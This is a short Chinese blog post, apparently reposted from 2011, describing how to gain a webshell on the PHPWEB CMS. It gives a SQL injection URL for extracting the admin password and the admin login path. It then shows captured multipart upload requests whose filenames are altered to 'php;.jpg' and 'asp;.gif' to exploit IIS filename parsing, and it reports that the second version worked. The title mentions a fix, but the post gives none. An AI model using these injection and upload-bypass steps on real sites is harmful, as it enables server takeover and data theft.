PHPWEB后台拿SHELL编辑器抓包NC漏洞及修复2011-10-07 13:50:10     我来说两句 收藏    我要投稿    [字体：小 大]  

 

刚看完电视闲着睡不着，随便找了个CMS在这玩，PHPWEB这么差劲啊，后台编辑器既然存在这种初级漏洞，刚看到一个别人说抓包后照样改的：

 

 

只适用于IIS的....apache没得玩....

 

先用注射点跑出密码

down/class/index.php?myord=1

 

之后后台地址是admin.php

 

登陆进去,找个发布文章的地方,找到一个发布文章的地方,比如

down/admin/down_conadd.php

 

点下面详细介绍里面的图片按钮`之后选择一个文件上传

这个时候抓包或者用本地代理的工具

-----------------------------7db229330de4

www.2cto.com Content-Disposition: form-data; name="fileName"

 

201108181313610483553.jpg

-----------------------------7db229330de4

Content-Disposition: form-data; name="attachPath"

 

down/pics/

-----------------------------7db229330de4

Content-Disposition: form-data; name="fileData"; filename="xm.jpg"

Content-Type: text/plain

 

 

得到上面的报文...

自己构造下,把filename="xm.jpg"改成filename="xm.php;.jpg"

之后发包就OK了...

 

 

 

 

这个我试了，不管用。

 

后来试着去尝试改生成之后的文件名截断，类似下边这样

 

 

 

 

-----------------------------7db29f214078c

 

Content-Disposition: form-data; name="fileName"

 

 

 

201109241316808273671.asp;.gif

 

-----------------------------7db29f214078c

 

Content-Disposition: form-data; name="attachPath"

 

 

 

news/pics/

 

-----------------------------7db29f214078c

 

Content-Disposition: form-data; name="fileData"; filename="2.asp;.gif"

 

Content-Type: text/plain

 

 

 

gb2312

 

<%

 

on error resume next

 

%>

 

 

 

这回管用了。

 

 

 

我在想个问题是不是类似这样的编辑器都存在NC提交问题呢？我一会试试其他的。

 from：zgg的空间
